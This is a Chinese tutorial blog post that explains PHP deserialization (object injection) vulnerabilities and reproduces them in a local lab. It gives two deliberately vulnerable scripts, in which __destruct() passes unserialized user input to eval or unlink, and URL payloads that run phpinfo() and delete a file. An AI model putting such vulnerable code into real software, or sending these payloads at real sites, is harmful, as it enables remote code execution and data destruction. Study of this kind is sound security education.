漏洞复现篇——PHP反序列化漏洞
2021/6/18 14:56:55
本文主要是介绍漏洞复现篇——PHP反序列化漏洞,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
简介
PHP反序列化漏洞也叫PHP对象注入,是一个非常常见的漏洞,这种类型的漏洞虽然有些难以利用,但一旦利用成功就会造成非常危险的后果。漏洞的形成的根本原因是程序没有对用户输入的反序列化字符串进行检测,导致反序列化过程可以被恶意控制,进而造成代码执行、getshell等一系列不可控的后果。反序列化漏洞并不是PHP特有,也存在于Java、Python等语言之中,但其原理基本相通。
什么是序列化和反序列化 序列化 serialize() 将对象转换成字符串 当在php中创建了一个对象后,可以通过serialize()把这个对象转变成一个字符串,保存对象的值方便之后的传递与使用。 反序列化 unserialize() 将特定格式的字符串转换成对象 与serialize()对应的,unserialize()可以从已存储的表示中创建PHP的值,单就本次所关心的环境而言,可以从序列化后的结果中恢复对象(object)。
__wakeup() //使用unserialize时触发 __sleep() //使用serialize时触发 __destruct() //对象被销毁时触发 __call() //在对象上下文中调用不可访问的方法时触发 __callStatic() //在静态上下文中调用不可访问的方法时触发 __construct() //当对象创建(new)时会自动调用。但在unserialize()时是不会自动调用的。 __get() //用于从不可访问的属性读取数据 __set() //用于将数据写入不可访问的属性 __isset() //在不可访问的属性上调用isset()或empty()触发 __unset() //在不可访问的属性上使用unset()时触发 __toString() //把类当作字符串使用时触发 __invoke() //当脚本尝试将对象调用为函数时触发实验环境:
- PHPstudy
- 火狐浏览器
利用__destruct()函数构造代码执行漏洞
模拟漏洞环境代码
<?php class person{ var $name; function __construct($name){ $this->name = $name; } function __destruct(){ echo eval($this->name); } } $str = $_GET["obj"]; $p1 = unserialize($str); ?>
在url后输入下列语句执行phpinfo
?obj=O:6:"person":1:{s:4:"name";s:10:"phpinfo();";}
执行成功
利用__destruct()函数构造任意文件删除漏洞
模拟漏洞环境代码
<?php class person{ var $name; function __construct($name){ $this->name = $name; } function __destruct(){ unlink(dirname(__FILE__)."/".$this->name); } } $str = $_GET["obj"]; $p1 = unserialize($str); ?>
在同一目录下创建一个1.txt的文件
在url中加入下列语句执行
?obj=O:6:"person":1:{s:4:"name";s:5:"1.txt";}
成功后无任何显示
再看一下1.txt已经被删除了
这篇关于漏洞复现篇——PHP反序列化漏洞的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-10-18PHP7.1可以使用哪个版本的swoole-icode9专业技术文章分享
- 2024-10-17php8 执行php -v提示 command not found是什么原因?-icode9专业技术文章分享
- 2024-10-17nginx 怎么配置 php?-icode9专业技术文章分享
- 2024-09-28怎么把PHP程序打包?-icode9专业技术文章分享
- 2024-09-28怎么用Phar打包PHP程序?-icode9专业技术文章分享
- 2024-09-13手动在github上下载的mfpt包,怎么放到thinkphp5.0框架并正常使用-icode9专业技术文章分享
- 2024-09-05python的<class 'bytearray'>相当于php的哪个数据类型-icode9专业技术文章分享
- 2024-09-05php 导出银行卡号避免科学技术法的方法-icode9专业技术文章分享
- 2024-08-30什么样的php代码质量差被称为垃圾代码-icode9专业技术文章分享
- 2024-08-30用 PHP 调用拼多多的接口以获取订单状态消息的步骤方法和代码示例-icode9专业技术文章分享